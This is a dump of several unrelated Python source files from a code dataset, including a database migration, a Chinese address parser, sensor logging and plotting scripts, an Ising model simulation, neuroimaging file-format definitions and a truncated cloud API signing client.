(_insert_operation_category_operation,\n 'DELETE FROM operation_category_operation WHERE operation_id BETWEEN 5071 AND 5072'),\n (_insert_operation_category_translation,\n 'DELETE FROM operation_category_translation WHERE id = 5070'),\n (_insert_operation_platform,\n 'DELETE FROM operation_platform WHERE operation_id BETWEEN 5071 AND 5072 AND platform_id = {}'.format(KERAS_PLATAFORM_ID)),\n\n # Port and interfaces\n (_insert_operation_port,\n 'DELETE FROM operation_port WHERE id IN (5172, 5271)'),\n (_insert_operation_port_interface_operation_port,\n 'DELETE FROM operation_port_interface_operation_port WHERE operation_port_id IN (5172, 5271)'),\n (_insert_operation_port_translation,\n 'DELETE FROM operation_port_translation WHERE id IN (5172, 5271)'),\n\n # Forms\n (_insert_operation_form,\n 'DELETE FROM operation_form WHERE id BETWEEN 5171 AND 5177'),\n (_insert_operation_form_field,\n 'DELETE FROM operation_form_field WHERE id BETWEEN 5171 AND 5177'),\n (_insert_operation_form_translation,\n 'DELETE FROM operation_form_translation WHERE id BETWEEN 5171 AND 5177'),\n (_insert_operation_form_field_translation,\n 'DELETE FROM operation_form_field_translation WHERE id BETWEEN 5171 AND 5177'),\n (_insert_operation_operation_form,\n 'DELETE FROM operation_operation_form WHERE operation_id IN (5071, 5072)'),\n]\n\n\ndef upgrade():\n ctx = context.get_context()\n session = sessionmaker(bind=ctx.bind)()\n connection = session.connection()\n\n try:\n for cmd in all_commands:\n if isinstance(cmd[0], str):\n connection.execute(cmd[0])\n elif isinstance(cmd[0], list):\n for row in cmd[0]:\n connection.execute(row)\n else:\n cmd[0]()\n except:\n session.rollback()\n raise\n session.commit()\n\n\ndef downgrade():\n ctx = context.get_context()\n session = sessionmaker(bind=ctx.bind)()\n connection = session.connection()\n\n try:\n connection.execute('SET foreign_key_checks = 0;')\n for cmd in reversed(all_commands):\n if isinstance(cmd[1], str):\n connection.execute(cmd[1])\n elif isinstance(cmd[1], list):\n for row in cmd[1]:\n connection.execute(row)\n else:\n cmd[1]()\n connection.execute('SET foreign_key_checks = 1;')\n except:\n session.rollback()\n raise\n session.commit()\n\n","sub_path":"migrations/versions/8647edf5eaad_add_keras_input_and_output_layers.py","file_name":"8647edf5eaad_add_keras_input_and_output_layers.py","file_ext":"py","file_size_in_byte":13230,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"455289561","text":"# coding=utf-8\nimport re\nimport json\nimport os\nimport openpyxl\n#五级地址解析库 ,返回前四级地址\n\nabbrProvinces=[\n '北京','天津','河北','山西','内蒙古','辽宁','吉林','黑龙江','上海','江苏',\n '浙江','安徽','福建','江西','山东','河南','湖北','湖南','广东','广西',\n '海南','重庆','四川','贵州','云南','西藏','陕西','甘肃','青海','宁夏','新疆'\n]\n#省全拼\nallProvinces=[\n '北京','天津','河北省','山西省','内蒙古自治区','辽宁省','吉林省','黑龙江省','上海','江苏省',\n '浙江省','安徽省','福建省','江西省','山东省','河南省','湖北省','湖南省','广东省','广西壮族自治区',\n '海南省','重庆','四川省','贵州省','云南省','西藏自治区','陕西省','甘肃省','青海省','宁夏回族自治区','新疆维吾尔自治区'\n]\nclass Load():\n def __init__(self):\n\n self.provinces={}\n self.cities={}\n self.countries={}\n self.towns={}\n self.loadXlsx()\n def loadXlsx(self):\n proPath='./省.xlsx'\n cityPath='./市.xlsx'\n countyPath='./县.xlsx'\n townPath='./乡.xlsx'\n wb=openpyxl.load_workbook(proPath)\n sheet=wb['Sheet1']\n for row in sheet.rows:\n self.provinces[row[1].value]=row[0].value\n self.provinces[row[0].value]=row[1].value\n wb = openpyxl.load_workbook(cityPath)\n sheet = wb['Sheet1']\n for row in sheet.rows:\n dic = {}\n dic['city'] = row[0].value\n dic['province_id']=row[2].value\n self.cities[row[1].value] = dic\n\n dic['city_id']=row[1].value\n dic['province_id'] = row[2].value\n self.cities[row[0].value]=dic\n\n wb = openpyxl.load_workbook(countyPath)\n sheet = wb['Sheet1']\n for row in sheet.rows:\n dic={}\n dic['country']=row[0].value\n dic['city_id']=row[2].value\n self.countries[row[1].value] =dic\n\n dic['country_id'] = row[1].value\n dic['city_id'] = row[2].value\n self.countries[row[0].value] = dic\n\n wb = openpyxl.load_workbook(townPath)\n sheet = wb['Sheet1']\n for row in sheet.rows:\n dic={}\n dic['town']=row[0].value\n dic['city_id']=row[2].value\n self.towns[row[1].value] = dic\n\n dic['town_id'] = row[1].value\n dic['city_id'] = row[2].value\n self.towns[row[0].value] = dic\n\n def parse(self,addr):\n provinces,cities,countries,towns=self.provinces,self.cities,self.countries,self.towns\n #找出省\n #print(provinces,cities,countries,towns)\n dic={\n 'province':'',\n 'city':'',\n 'country':'',\n 'town':'',\n 'detail':'',\n }\n for i in abbrProvinces:\n if i in addr and ( addr.find(i)==0):#保证第一个省正确\n dic['province']=allProvinces[abbrProvinces.index(i)]\n if dic['province'] in ['北京','天津','上海','重庆']:\n dic['city']=dic['province']+'市'\n break\n if dic['province']=='':\n for i in cities:\n if (cities[i]['city'] or cities[i]['city'][:-1]) in addr:\n dic['provnice']=provinces[cities[i]['city_id'][:2]+10*'0']\n break\n if dic['province']=='':\n for i in countries:\n if countries[i]['country'] in addr:\n dic['province']=provinces[countries[i]['country_id'][:2]+10*'0']\n break\n if dic['province'] == '':\n for i in towns:\n if towns[i]['town'] in addr:\n dic['province']=provinces[towns[i]['town_id'][:2]+10*'0']\n #print(dic['province'])\n province_id = provinces[dic['province']]\n if dic['province']:\n if (dic['province'][-1] == '省') or (dic['province'] in ['北京', '天津', '重庆', '上海']):\n if dic['province'] in ['北京', '天津', '重庆', '上海']:\n # match=re.match(dic['province'],addr)\n dic['city']=dic['province']+'市'\n span = addr.find(dic['province']) + len(dic['province'])\n if addr[span] == '市':\n addr = addr.replace(dic['city'], '', 1)\n else:\n addr = addr.replace(dic['province'], '', 1)\n else:\n span = addr.find(abbrProvinces[allProvinces.index(dic['province'])]) + len(\n abbrProvinces[allProvinces.index(dic['province'])])\n # print(match.span())\n if addr[span] == '省':\n addr = addr.replace(dic['province'], '', 1)\n else: # 后面没有省\n addr = addr.replace(dic['province'][:-1], '', 1)\n else:\n addr = addr.replace(dic['province'], '', 1)\n\n\n if dic['city'] == '':\n for i in cities:\n if i[:2]==province_id[:2]:#保证分词正确\n if (cities[i]['city'] in addr) and addr.find(cities[i]['city']) ==0:\n dic['city']=cities[i]['city']\n if ((cities[i]['city'][:-1]) in addr ) and ( addr.find(cities[i]['city'][:-1])==0):\n dic['city']=cities[i]['city']\n\n #找到县\n if dic['city']:\n if (not (dic['province'] in ['北京', '天津', '重庆', '上海'])) and (dic['city'][-1] == '市'):\n span = addr.find(dic['city'][:-1]) + len(dic['city'][:-1])\n if addr[span] == '市':\n addr = addr.replace(dic['city'], '', 1)\n else:\n addr = addr.replace(dic['city'][:-1], '', 1)\n else:\n addr = addr.replace(dic['city'], '', 1)\n\n for i in countries:\n #print(countries[i])\n if (countries[i]['country'] in addr) and (province_id[:2]==countries[i]['country_id'][:2]) :\n if addr.find(countries[i]['country'])==0:\n dic['country'] = countries[i]['country']\n addr=addr.replace(dic['country'],'',1)\n if dic['city']=='' :\n if i[:4]+8*'0' in cities:\n dic['city']=cities[i[:4]+8*'0']['city']\n break\n if dic['city']:\n if (not (dic['province'] in ['北京', '天津', '重庆', '上海'])) and (dic['city'][-1] == '市'):\n span = addr.find(dic['city'][:-1]) + len(dic['city'][:-1])\n if addr[span] == '市':\n addr = addr.replace(dic['city'], '', 1)\n else:\n addr = addr.replace(dic['city'][:-1], '', 1)\n else:\n addr = addr.replace(dic['city'], '', 1)\n for i in towns:\n #print(towns[i])\n if (re.findall(towns[i]['town'],addr) ) and (province_id[:2]==towns[i]['town_id'][:2]):\n if addr.find(towns[i]['town'])==0:\n #print(towns[i]['town'])\n dic['town']=towns[i]['town']\n addr=addr.replace(dic['town'],'',1)\n if dic['city']=='':\n if i[:4]+8*'0' in cities:\n dic['city']=cities[i[:4]+8*'0']['city']\n if dic['country']=='':\n if i[:7]+5*'0' in countries:\n dic['country'] = countries[i[:7] + 5 * '0']['country']\n break\n\n if dic['city']:\n if (not (dic['province'] in ['北京', '天津', '重庆', '上海'])) and (dic['city'][-1] == '市'):\n span = addr.find(dic['city'][:-1]) + len(dic['city'][:-1])\n if addr[span] == '市':\n addr = addr.replace(dic['city'], '', 1)\n else:\n addr = addr.replace(dic['city'][:-1], '', 1)\n else:\n addr = addr.replace(dic['city'], '', 1)\n\n # addr = addr.replace(dic['town'], '', 1)\n # addr = addr.replace(dic['country'], '', 1)\n dic['detail'] = addr\n #print(dic)\n return dic\n\n def parse2(self,addr,dic):\n provinces, cities, countries, towns = self.provinces, self.cities, self.countries, self.towns\n # 找出省\n # print(provinces,cities,countries,towns)\n #先匹配省\n if dic['province']:\n if dic['province'][-1] =='省':\n if (dic['province'] in addr) and (addr.find(dic['province'])==0):\n addr=addr.replace(dic['province'],'',1)\n elif (dic['province'][:-1] in addr) and (addr.find(dic['province'][0:-1])==0):\n addr = addr.replace(dic['province'][:-1], '', 1)\n else:\n dic['province']=''\n elif dic['province'] in ['北京','天津','重庆','上海']:\n if (dic['province']+'市' in addr) and (addr.find(dic['province']+'市') == 0):\n pass\n else:#后缀不是省市\n if (dic['province'] in addr) and (addr.find(dic['province'])==0):\n addr=addr.replace(dic['province'],'',1)\n else:\n dic['province']=''\n if dic['city']:\n if dic['city'][-1]=='市':\n if dic['city'] in addr and (addr.find(dic['city'])==0):\n addr = addr.replace(dic['city'], '', 1)\n elif (dic['city'][:-1] in addr) and (addr.find(dic['city'][:-1])==0):\n addr = addr.replace(dic['city'][:-1], '', 1)\n else:\n dic['city']=''\n else:\n if dic['city'] in addr and (addr.find(dic['city']) == 0):\n addr = addr.replace(dic['city'], '', 1)\n else:\n dic['city']=''\n if dic['country']:\n if dic['country'] in addr and (addr.find(dic['country']) == 0):\n addr = addr.replace(dic['country'], '', 1)\n else:\n dic['country'] = ''\n if dic['town']:\n if dic['town'] in addr and (addr.find(dic['town'])==0):\n addr = addr.replace(dic['town'], '', 1)\n else:\n dic['town']=''\n dic['detail']=addr\n #print('dic',dic)\n return dic\n\n\nif __name__=='__main__':\n x='北京市东城区交道口东大街1号北京市东城区人民法院'\n","sub_path":"041702324/parseAddr.py","file_name":"parseAddr.py","file_ext":"py","file_size_in_byte":10696,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"318215636","text":"# processes useful csv and visualizes the spectral analysis\n# Important: csv data is assumed to be in Nx7 format with columns:\n# time | lat_accel | long_accel | vert_accel | x_angular_vel| y_angular_vel | z_angular_vel\n# TODO: Add a prompt for user to input file name of generated csv files\n# and/or use both preprocess and data_vis in collective main\n\nimport csv\nimport numpy as np\nimport scipy\nimport matplotlib.pyplot as plt\nfrom tkinter.filedialog import askopenfilename\n\n\ndef cal_single_sided_power(Y):\n # calculate raw power spectrum\n n = len(Y)\n P2 = np.power(np.absolute(Y), 2) / n\n P1 = P2[0:int((n / 2 + 1))]\n P1[1:-1] = 2 * P1[1:-1]\n return P1\n\n\ndef plot_fft_imu_comparison(fft1, fft2, fft3, str, y_lim, fig):\n fs = 100 # sampling frequency\n\n n = len(fft1)\n f = fs*(np.arange(0, n)) / n / 2 # n-1?\n plt.figure(fig)\n plt.subplot(311)\n plt.legend('Nike')\n plt.plot(f, fft1)\n plt.title(str)\n plt.ylim((0,y_lim))\n\n plt.subplot(312)\n n = len(fft2)\n f = fs * (np.arange(0, n)) / n / 2\n plt.plot(f, fft2)\n plt.ylabel('Power = Magnitude^2')\n plt.legend('Odin')\n plt.ylim((0,y_lim))\n\n plt.subplot(313)\n n = len(fft3)\n f = fs * (np.arange(0, n)) / n / 2\n plt.plot(f, fft3)\n plt.xlabel('Frequency (Hz)')\n plt.legend(\"Lewis\")\n plt.ylim((0,y_lim))\n\n plt.show()\n\n# plot histogram of IMU force distribution for all readings\ndef plot_histogram():\n x = 0\n\n\ndef spectral_analysis(data_name):\n # opens csv and returns an array containing fft results of the fft sensor readings\n with open(data_name) as csv_file:\n csv_reader = csv.reader(csv_file, delimiter=',')\n\n data = list(csv_reader)\n row_count = len(data)\n\n csv_file.seek(0) # reset iterator to beginning\n\n time_raw = np.zeros(row_count)\n long_accel_raw = np.zeros(row_count)\n lat_accel_raw = np.zeros(row_count)\n vert_accel_raw = np.zeros(row_count)\n angvel_x_raw = np.zeros(row_count) #roll\n angvel_y_raw = np.zeros(row_count) #pitch\n angvel_z_raw = np.zeros(row_count) #yaw\n\n iteration = 0\n\n for row in csv_reader:\n time_raw[iteration] = row[0]\n long_accel_raw[iteration] = row[2]\n lat_accel_raw[iteration] = row[1]\n vert_accel_raw[iteration] = row[3]\n angvel_x_raw[iteration] = row[4]\n angvel_y_raw[iteration] = row[5]\n angvel_z_raw[iteration] = row[6]\n\n iteration+=1\n print(iteration)\n\n print(time_raw)\n # get fft results\n long_accel_fft = scipy.fft(long_accel_raw)\n lat_accel_fft = scipy.fft(lat_accel_raw)\n vert_accel_fft = scipy.fft(vert_accel_raw)\n angvel_x_fft = scipy.fft(angvel_x_raw)\n angvel_y_fft = scipy.fft(angvel_y_raw)\n angvel_z_fft = scipy.fft(angvel_z_raw)\n\n # calculate raw power spectrum\n long_accel_fftpower = cal_single_sided_power(long_accel_fft)\n lat_accel_fftpower = cal_single_sided_power(lat_accel_fft)\n vert_accel_fftpower = cal_single_sided_power(vert_accel_fft)\n angvel_x_fftpower = cal_single_sided_power(angvel_x_fft)\n angvel_y_fftpower = cal_single_sided_power(angvel_y_fft)\n angvel_z_fftpower = cal_single_sided_power(angvel_z_fft)\n\n comb_array = [long_accel_fftpower, lat_accel_fftpower, vert_accel_fftpower,\n angvel_x_fftpower, angvel_y_fftpower, angvel_z_fftpower]\n\n return comb_array\n\n\nif __name__ == '__main__':\n lewis_fftpower = spectral_analysis(\"imu_stack_lewis.csv\")\n atlas_fftpower = spectral_analysis(\"post_processed_data_test.csv\")\n nike_fftpower = spectral_analysis(\"imu_stack_nike.csv\")\n odin_fftpower = spectral_analysis(\"imu_stack_odin.csv\")\n\n # plot results\n # longitudinal acceleration power comparison\n plot_fft_imu_comparison(nike_fftpower[0], odin_fftpower[0], lewis_fftpower[0], \"Longitudinal Acceleration\", 50, 1)\n plot_fft_imu_comparison(nike_fftpower[1], odin_fftpower[1], lewis_fftpower[1], \"Lateral Acceleration\", 100, 2)\n plot_fft_imu_comparison(nike_fftpower[2], odin_fftpower[2], lewis_fftpower[2], \"Vertical Acceleration\", 100, 3)\n plot_fft_imu_comparison(nike_fftpower[3], odin_fftpower[3], lewis_fftpower[3], \"Angular Velocity_x (Roll)\", 0.3, 4)\n plot_fft_imu_comparison(nike_fftpower[4], odin_fftpower[4], lewis_fftpower[4], \"Angular Velocity_y (Pitch)\", 0.5, 5)\n plot_fft_imu_comparison(nike_fftpower[5], odin_fftpower[5], lewis_fftpower[5], \"Angular Velocity_z (Yaw)\", 1, 6)\n\n plot_histogram()\n","sub_path":"python_code/data_visualization.py","file_name":"data_visualization.py","file_ext":"py","file_size_in_byte":4583,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"165437572","text":"\n\nimport time\nimport json\nimport board\nimport busio\nimport adafruit_bme280\nimport csv\nimport datetime\nimport smtplib\nimport json\nimport datetime\n\ndef mail_alert1(): \n fromaddr = email\n toaddrs = email\n msg = 'Subject: {}\\n\\n{}'.format('Indoor Unit ' + sensorParameters['ID'] + ' ' +'BME280 error', 'Sensor' + '_' + sensorParameters['ID'] + ' BME280 error ' + currentTime.strftime('%Y%m%d_%H%M%S'))\n\n# Credentials (if needed)\n username = email\n password = pw\n\n# The actual mail send\n server = smtplib.SMTP('smtp.gmail.com:587')\n server.starttls()\n server.login(username,password)\n server.sendmail(fromaddr, toaddrs, msg)\n server.quit()\n\ndef mail_alert2(): \n fromaddr = email\n toaddrs = email_2\n msg = 'Subject: {}\\n\\n{}'.format('Indoor Unit ' + sensorParameters['ID'] + ' ' +'BME280 error', 'Sensor' + '_' + sensorParameters['ID'] + ' BME280 error at ' + currentTime.strftime('%Y%m%d_%H%M%S'))\n\n# Credentials (if needed)\n username = email\n password = pw\n\n# The actual mail send\n server = smtplib.SMTP('smtp.gmail.com:587')\n server.starttls()\n server.login(username,password)\n server.sendmail(fromaddr, toaddrs, msg)\n server.quit()\n\n\n\nwith open('sensorParameters.json') as json_file:\n sensorParameters=json.load(json_file)\n\nwith open('/home/pi/SpokaneSchools/software/Name_1.txt','r') as file:\n email=file.read()\n \nwith open('/home/pi/SpokaneSchools/software/Name_3.txt','r') as file:\n email_2=file.read()\n\nwith open('/home/pi/SpokaneSchools/software/Name_2.txt','r') as file:\n pw=file.read()\n \n\n\n# Create library object using our Bus I2C port\ni2c = busio.I2C(board.SCL, board.SDA)\nbme280 = adafruit_bme280.Adafruit_BME280_I2C(i2c)\n\n\n# change this to match the location's pressure (hPa) at sea level\nbme280.sea_level_pressure = 1013.25\n\n#Once JSON file is created, open the file to read in sensorParameters\nwith open('/home/pi/SpokaneSchools/Cloud/sensorParameters.json') as json_file:\n sensorParameters=json.load(json_file)\n\n# Create a unique filename for the current date.\ncurrentHour = datetime.datetime.now().hour\ncurrentTime = datetime.datetime.now()\ncurrentDate = currentTime.date()\nfilename = 'BME_' + sensorParameters['name'] + '_' + sensorParameters['ID'] + '_' +currentTime.strftime('%Y%m%d_%H%M%S') + '.csv'\n\n### Initialize variables to store in CSV file.\ndata_file = []\n\n\nwith open('/home/pi/SpokaneSchools/Data/Default_Frequency/' + filename, 'w') as f:\n writer = csv.DictWriter(f, fieldnames = [\"Datetime\",\"temp\", \"P\", \"RH\"])\n writer.writeheader()\n #init_headers.to_csv(f, header=True)\n f.close()\n\n\nwhile True:\n try:\n if (datetime.datetime.now().date() != currentDate):\n with open('/home/pi/SpokaneSchools/Data/Default_Frequency/' + filename, 'a') as f:\n wr = csv.writer(f, delimiter = ',')\n wr.writerows(data_file)\n f.close()\n currentHour = datetime.datetime.now().hour\n currentTime = datetime.datetime.now()\n currentDate = currentTime.date()\n data_file = []\n\n filename = 'BME_' + sensorParameters['name'] + '_' + sensorParameters['ID'] + '_' +currentTime.strftime('%Y%m%d_%H%M%S') + '.csv'\n with open('/home/pi/SpokaneSchools/Data/Default_Frequency/' + filename, 'w') as f:\n writer = csv.DictWriter(f, fieldnames = ['Datetime', 'temp', 'P', 'RH'])\n writer.writeheader()\n f.close()\n\n if datetime.datetime.now().hour != currentHour:\n with open('/home/pi/SpokaneSchools/Data/Default_Frequency/' + filename, 'a') as f:\n wr = csv.writer(f, delimiter = ',')\n wr.writerows(data_file)\n f.close()\n currentHour = datetime.datetime.now().hour\n data_file = []\n \n # create error to see if email is sent (comment out after confirming function)\n #error = unknown_variable\n data_line = [datetime.datetime.now().isoformat(), bme280.temperature, bme280.pressure, bme280.humidity]\n data_file.append(data_line)\n print(data_line)\n print(\"\\nTemperature: %0.1f C\" % bme280.temperature)\n print(\"Humidity: %0.1f %%\" % bme280.humidity)\n print(\"Pressure: %0.1f hPa\" % bme280.pressure)\n print(\"Altitude = %0.2f meters\" % bme280.altitude)\n time.sleep(120)\n \n except:\n currentTime = datetime.datetime.now()\n\n mail_alert1()\n #mail_alert2()\n time.sleep(3600)\n\n","sub_path":"python/monitoring/bme280.py","file_name":"bme280.py","file_ext":"py","file_size_in_byte":4577,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"503064148","text":"#Tarea 3- Mecanica Estadistica - modelo de Ising\nimport numpy as np\nimport numpy.random as rand\nimport matplotlib.pyplot as plt\n\n#%%% Calculo de energia\ndef Estado(i,j):\n A[i,j] = -A[i,j] # Cambio de estado de un espin\n \ndef Energia(): # Energia total de la red\n E_T = 0\n for i in range(N):\n for j in range(N):\n E_T += -A[i,j]*(A[(i+1)%N,j]+ A[(i-1)%N,j]+A[i,(j+1)%N]+A[i,(j-1)%N])\n # calculo de la energia de interaccion y sumado\ndef Magnetizacion():\n return np.sum(A)/N**2 # Calculo magnetizacion\n \ndef Metstep(alpha): # Algoritmo metropolis\n for k in range(N**2):\n i = rand.randint(N) # Seleccion de espin a la azar\n j = rand.randint(N)\n dE = 2*A[i,j]*(A[(i+1)%N,j]+ A[(i-1)%N,j]+A[i,(j+1)%N]+A[i,(j-1)%N])\n # Cambio de energia\n if (dE <=0 or np.exp(-alpha*dE)> rand.rand()):\n Estado(i,j) # Cambiar de estado\ndef CalculoVariables(alpha,A,mcsteps):\n # simulacion\n t = np.linspace(1,mcsteps,mcsteps)\n E = [] # Energia\n M = [] # Magnetizacion\n for i in range(mcsteps):\n Metstep(alpha) # Paso\n E.append(Energia())\n M.append(Magnetizacion())\n return (t,E,M)\n#%%\nT_f = np.array([1/4,1/2,3/4,7/8,15/16,17/16,9/8,5/4,3/2,7/4])\n# Temperaturas\nalpha_c = 0.44069 # DEfinido en el informe\n#Critico\nalpha = alpha_c/T_f\n#%%\nN = 40\nEE = []\nMM = []\nfor l in range(8):\n rand.seed(6)\n A_0 = np.ones([N,N])\n A = A_0 + 2*rand.randint(-1,1,(N,N))\n # Inicializacion de la matriz de espines\n (t,E,M) = CalculoVariables(alpha[l],A,10000)\n EE.append(np.mean(E[2000:]))\n MM.append(np.mean(M[2000:]))\n\n#%% Graficas \nplt.figure()\nplt.scatter(T_f,np.abs(MM))\nplt.xlabel('T/Tc')\nplt.ylabel('M/N')\nplt.savefig('Mac.jpg') \n#%%\nplt.figure()\nplt.scatter(T_f,EE)\nplt.xlabel('T/Tc')\nplt.ylabel('E/JN')\nplt.savefig('Ener.jpg') \n \n","sub_path":"Ising.py","file_name":"Ising.py","file_ext":"py","file_size_in_byte":1855,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"387793885","text":"from copy import deepcopy, copy\nfrom arcana.node import Node\nfrom arcana.file_format import FileFormat, Converter\nfrom nianalysis.interfaces.mrtrix import MRConvert\nfrom nianalysis.requirement import (\n dcm2niix_req, mrtrix3_req)\nfrom nianalysis.interfaces.converters import Dcm2niix\nfrom arcana.file_format import (\n text_format, directory_format, zip_format, targz_format) # @UnusedImport\n\n\nclass Dcm2niixConverter(Converter):\n\n requirements = [dcm2niix_req]\n\n def get_node(self, name):\n convert_node = Node(Dcm2niix(), name=name,\n requirements=self.requirements,\n wall_time=20)\n convert_node.inputs.compression = 'y'\n return convert_node, 'input_dir', 'converted'\n\n\nclass MrtrixConverter(Converter):\n\n requirements = [mrtrix3_req]\n\n def get_node(self, name):\n convert_node = Node(MRConvert(), name=name,\n requirements=self.requirements)\n convert_node.inputs.out_ext = self._output_format.extension\n convert_node.inputs.quiet = True\n return convert_node, 'in_file', 'out_file'\n\n\n# =====================================================================\n# All Data Formats\n# =====================================================================\n\n\n# NeuroImaging data formats\ndicom_format = FileFormat(name='dicom', extension=None,\n directory=True, within_dir_exts=['.dcm'],\n alternate_names=['secondary'])\nnifti_format = FileFormat(name='nifti', extension='.nii',\n converters={'dicom': Dcm2niixConverter,\n 'analyze': MrtrixConverter,\n 'nifti_gz': MrtrixConverter,\n 'mrtrix': MrtrixConverter})\nnifti_gz_format = FileFormat(name='nifti_gz', extension='.nii.gz',\n converters={'dicom': Dcm2niixConverter,\n 'nifti': MrtrixConverter,\n 'analyze': MrtrixConverter,\n 'mrtrix': MrtrixConverter})\nanalyze_format = FileFormat(name='analyze', extension='.img',\n converters={'dicom': MrtrixConverter,\n 'nifti': MrtrixConverter,\n 'nifti_gz': MrtrixConverter,\n 'mrtrix': MrtrixConverter})\nmrtrix_format = FileFormat(name='mrtrix', extension='.mif',\n converters={'dicom': MrtrixConverter,\n 'nifti': MrtrixConverter,\n 'nifti_gz': MrtrixConverter,\n 'analyze': MrtrixConverter})\n\n# Tabular formats\nrfile_format = FileFormat(name='rdata', extension='.RData')\n# matlab_format = FileFormat(name='matlab', extension='.mat')\ncsv_format = FileFormat(name='comma-separated_file', extension='.csv')\ntext_matrix_format = FileFormat(name='text_matrix', extension='.mat')\n\n# Diffusion gradient-table data formats\nfsl_bvecs_format = FileFormat(name='fsl_bvecs', extension='.bvec')\nfsl_bvals_format = FileFormat(name='fsl_bvals', extension='.bval')\nmrtrix_grad_format = FileFormat(name='mrtrix_grad', extension='.b')\n\n# Tool-specific formats\neddy_par_format = FileFormat(name='eddy_par',\n extension='.eddy_parameters')\nfreesurfer_recon_all_format = FileFormat(name='fs_recon_all',\n directory=True)\nica_format = FileFormat(name='ica', extension='.ica', directory=True)\npar_format = FileFormat(name='parameters', extension='.par')\nmotion_mats_format = FileFormat(\n name='motion_mats', directory=True, within_dir_exts=['.mat'],\n desc=(\"Format used for storing motion matrices produced during \"\n \"motion detection pipeline\"))\n\n\n# General image formats\ngif_format = FileFormat(name='gif', extension='.gif')\npng_format = FileFormat(name='png', extension='.png')\njpg_format = FileFormat(name='jpg', extension='.jpg')\n\n# PET formats\nlist_mode_format = FileFormat(name='pet_list_mode', extension='.bf')\n\n# Raw formats\ndat_format = FileFormat(name='dat', extension='.dat')\n\n# MRS format\nrda_format = FileFormat(name='raw', extension='.rda')\n\n# Record list of all data formats registered by module (not really\n# used currently but could be useful in future)\nregistered_file_formats = []\n\n# Register all data formats in module\nfor file_format in copy(globals()).values():\n if isinstance(file_format, FileFormat):\n FileFormat.register(file_format)\n registered_file_formats.append(file_format.name)\n\n# Since the conversion from DICOM->NIfTI is unfortunately slightly\n# different between MRConvert and Dcm2niix, these data formats can\n# be used in pipeline input specs that need to use MRConvert instead\n# of Dcm2niix (i.e. motion-detection pipeline)\nmrconvert_nifti_format = deepcopy(nifti_format)\nmrconvert_nifti_format._converters['dicom'] = MrtrixConverter\nmrconvert_nifti_gz_format = deepcopy(nifti_gz_format)\nmrconvert_nifti_gz_format._converters['dicom'] = MrtrixConverter\n","sub_path":"nianalysis/file_format.py","file_name":"file_format.py","file_ext":"py","file_size_in_byte":5198,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"189701566","text":"import sys\nimport requests\n\nwords_to_check = sys.argv[1:]\n\n# This dictionary is a newline-separated list of words, in the format of:\n# `Word/FLAGS`, where `FLAGS` describes possible permutations of that word, See\n# https://cgit.freedesktop.org/libreoffice/dictionaries/tree/en/affDescription.txt\nDICTIONARY_URL = \"https://cgit.freedesktop.org/libreoffice/dictionaries/plain/en/en_US.dic\"\n\nresponse = requests.get(DICTIONARY_URL)\nword_definitions = response.text.splitlines()\n\n# The first line contains the number of words, which we don't need\nword_definitions.pop(0)\n\n# Compile your dictionary\nwords = []\nfor word_definition in word_definitions: \n word = word_definition.split(\"/\")[0] \n\n if len(word_definition.split(\"/\")) > 1: \n flags = word_definition.split(\"/\")[1]\n else:\n flags = \"\"\n\n words.append({\"word\": word, \"flags\": flags})\n\n\n#Find each word that's in the dictionary\n# for word in words: \n# for index, word_to_check in enumerate(words_to_check):\n# if word[\"word\"] == word_to_check:\n# print(f\"{word_to_check} is a word\")\n# words_to_check.pop(index)\n\n# # Any words remaining must not be words\n# for word_to_check in words_to_check:\n# print(f\"{word_to_check} is not a word\")\n\n\n\nfor word in words: \n for index, word_to_check in enumerate(words_to_check):\n if (word[\"word\"] == word_to_check):\n if (word_to_check[0] == word_to_check[0].lower()):\n print(f\"{word_to_check} is a word\")\n words_to_check.pop(index)\n else:\n print(f\"{word_to_check} is not a word\")\n words_to_check.pop(index)\n\n# Any words remaining must not be words\nfor word_to_check in words_to_check:\n print(f\"{word_to_check} is not a word\")\n \n\n\n\n\n\n\n","sub_path":"challenges/dictionary.py","file_name":"dictionary.py","file_ext":"py","file_size_in_byte":1790,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"548104620","text":"# -*- coding: utf8 -*-\nimport time\nimport logging\n\nimport random\nimport base64\nimport hashlib\nimport hmac\nimport binascii\nimport copy\n\ntry:\n from urllib.parse import urlencode # Python3\nexcept ImportError:\n from urllib import urlencode # Python2\n\nclass TkeClient(object):\n \"\"\"\n CCE客户端配置\n \"\"\"\n\n def __init__(self, credential, action, host, uri, sign_method, version = None, region = ''):\n \"\"\"\n 云API类初始化,公共参数:\n credential: 公钥/私钥\n action:云API方法\n host:云APIhostname\n uri云API uri\n sign_method:签名算法\n version:云API Version\n region: 云API地域\n\n 调用继承类具体方法的时候可以修改上面参数\n \"\"\"\n self.credential = credential\n self.action = action\n\n self.host = host\n self.uri = uri\n self.sign_method = sign_method\n\n self.pub_param = {\n 'Action': self.action,\n 'SecretId': self.credential['secret_id'],\n }\n if region:\n self.region = region\n self.pub_param['Region'] = self.region\n if version:\n self.version = version\n self.pub_param['Version'] = self.version\n\n # sign应创建一个类\n def sign(self, method, param = None):\n final_param = {}\n final_param.update(self.pub_param)\n if param:\n final_param.update(param)\n sign_obj = Sign(self.credential['secret_key'], self.host, self.uri, self.sign_method, final_param)\n return sign_obj.sign_encode(method)\n\nclass Sign(object):\n \"\"\"\n 签名方法\n \"\"\"\n\n def __init__(self, secret_key, host, uri, sign_method, param):\n self.secret_key = secret_key\n self.host = host\n self.uri = uri\n self.sign_method =sign_method\n self.param = copy.deepcopy(param)\n self.param['Timestamp'] = int(time.time())\n self.param['Nonce'] = random.randint(0, 0xffff)\n\n def build(self, method):\n \"\"\"\n 生成签名凭证\n \"\"\"\n logging.debug(\"request params to sign: {}\".format(self.param))\n\n p = {}\n for k in self.param:\n if method == 'POST' and str(self.param[k])[0:1] == '@':\n continue\n p[k.replace('_', '.')] = self.param[k]\n ps = '&'.join('%s=%s' % (k, p[k]) for k in sorted(p))\n \n msg = '%s%s%s?%s' % (method.upper(), 